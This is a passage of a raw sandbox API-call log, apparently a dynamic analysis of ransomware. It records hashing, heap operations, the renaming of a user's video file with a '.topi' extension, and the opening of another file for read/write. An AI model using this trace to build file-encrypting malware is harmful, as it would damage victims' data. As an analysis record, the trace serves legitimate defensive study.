returned 1 [0097.303] CryptCreateHash (in: hProv=0x6df448, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0097.303] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.303] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0097.303] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0097.303] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0097.303] GetLastError () returned 0x0 [0097.303] CryptDestroyHash (hHash=0x31c7580) returned 1 [0097.303] CryptReleaseContext (hProv=0x6df448, dwFlags=0x0) returned 1 [0097.303] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.303] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0097.303] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0097.303] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.303] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0097.304] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.304] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.304] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x13e30) returned 0x9a06a00 [0097.304] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.304] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.304] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0097.304] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.304] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0097.304] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0097.304] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fb338 [0097.304] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4d60 [0097.304] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fb380 [0097.304] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4d78 [0097.304] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4da8 [0097.304] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.304] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4dc0 [0097.304] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0097.304] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0097.305] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0097.305] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0097.305] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4da8 | out: hHeap=0x680000) returned 1 [0097.305] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0097.305] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.305] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0097.305] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.305] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.305] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0097.305] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4dc0 [0097.305] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0097.305] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4da8 [0097.305] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0097.305] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0097.305] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.305] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0097.305] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0097.305] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0097.305] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0097.305] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.305] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.305] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0097.305] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.305] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4da8 | out: hHeap=0x680000) returned 1 [0097.305] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0097.305] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.305] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.306] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.306] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0097.306] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.306] GetCurrentThreadId () returned 0x8c4 [0097.306] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0097.306] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f9650 [0097.306] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0097.306] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df448 [0097.306] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0097.306] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.306] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.306] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0097.306] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.306] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.306] GetCurrentThreadId () returned 0x8c4 [0097.306] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.306] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.306] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0097.306] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.306] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.306] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.306] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.306] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0097.306] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0097.306] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.306] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0097.307] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.307] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0097.307] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.307] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.307] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.307] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.307] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0097.307] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0097.307] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0097.307] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.307] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0097.307] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.307] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4da8 [0097.307] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.307] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0097.307] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.307] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.307] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0097.307] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0097.307] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0097.307] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4dc0 [0097.307] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0097.307] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0097.307] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0097.307] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4d90 [0097.307] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0097.307] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.307] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.307] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.307] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.307] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.307] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0097.307] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4dd8 [0097.307] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.307] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a30 [0097.308] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.308] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0097.308] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.308] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0097.308] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0097.308] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0097.308] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4da8 | out: hHeap=0x680000) returned 1 [0097.308] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4da8 [0097.308] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.308] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0097.308] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.308] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0097.308] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.308] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0097.308] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0097.308] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0097.308] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0097.308] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0097.308] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4da8 | out: hHeap=0x680000) returned 1 [0097.308] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0097.308] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0097.308] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0097.308] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.308] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df448 | out: hHeap=0x680000) returned 1 [0097.308] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0097.308] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0097.308] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0097.308] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0097.308] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0097.308] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.309] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.309] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.309] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dd8 | out: hHeap=0x680000) returned 1 [0097.309] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.309] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.309] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\IgvWVBNSz\\6zDorq7n8.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\igvwvbnsz\\6zdorq7n8.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\IgvWVBNSz\\6zDorq7n8.avi.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\igvwvbnsz\\6zdorq7n8.avi.topi")) returned 1 [0097.310] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\IgvWVBNSz\\h3S74ZRbutT-6st.flv") returned=".flv" [0097.311] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\IgvWVBNSz\\h3S74ZRbutT-6st.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\igvwvbnsz\\h3s74zrbutt-6st.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0097.311] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=37262) returned 1 [0097.311] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0097.313] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x9168, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.313] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0097.314] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.314] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df448) returned 1 [0097.315] CryptCreateHash (in: hProv=0x6df448, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0097.315] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.315] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0097.315] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0097.316] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0097.316] GetLastError () returned 0x0 [0097.316] CryptDestroyHash (hHash=0x31c7580) returned 1 [0097.316] CryptReleaseContext (hProv=0x6df448, dwFlags=0x0) returned 1 [0097.316] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.316] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0097.316] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0097.316] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.316] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0097.316] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.316] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.316] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9190) returned 0x9a06a00 [0097.316] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.316] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.316] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0097.316] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.316] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0097.316] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0097.316] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fb380 [0097.316] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4d78 [0097.316] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fb3c8 [0097.316] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4d90 [0097.316] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4dc0 [0097.317] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.317] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4dd8 [0097.317] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0097.317] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0097.317] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0097.317] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0097.317] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0097.317] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dd8 | out: hHeap=0x680000) returned 1 [0097.317] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.317] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0097.317] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.317] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.317] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0097.317] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4dd8 [0097.317] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0097.317] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4dc0 [0097.317] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0097.317] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0097.317] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.317] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0097.317] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0097.317] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0097.317] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0097.317] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.317] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.317] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dd8 | out: hHeap=0x680000) returned 1 [0097.317] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.317] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0097.318] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0097.318] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.318] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.318] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.318] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0097.318] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.318] GetCurrentThreadId () returned 0x8c4 [0097.318] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0097.318] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f96e0 [0097.318] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0097.318] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df448 [0097.318] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0097.318] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.318] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.318] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0097.318] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.318] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.318] GetCurrentThreadId () returned 0x8c4 [0097.318] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.318] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.318] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0097.318] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.318] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.318] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.318] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 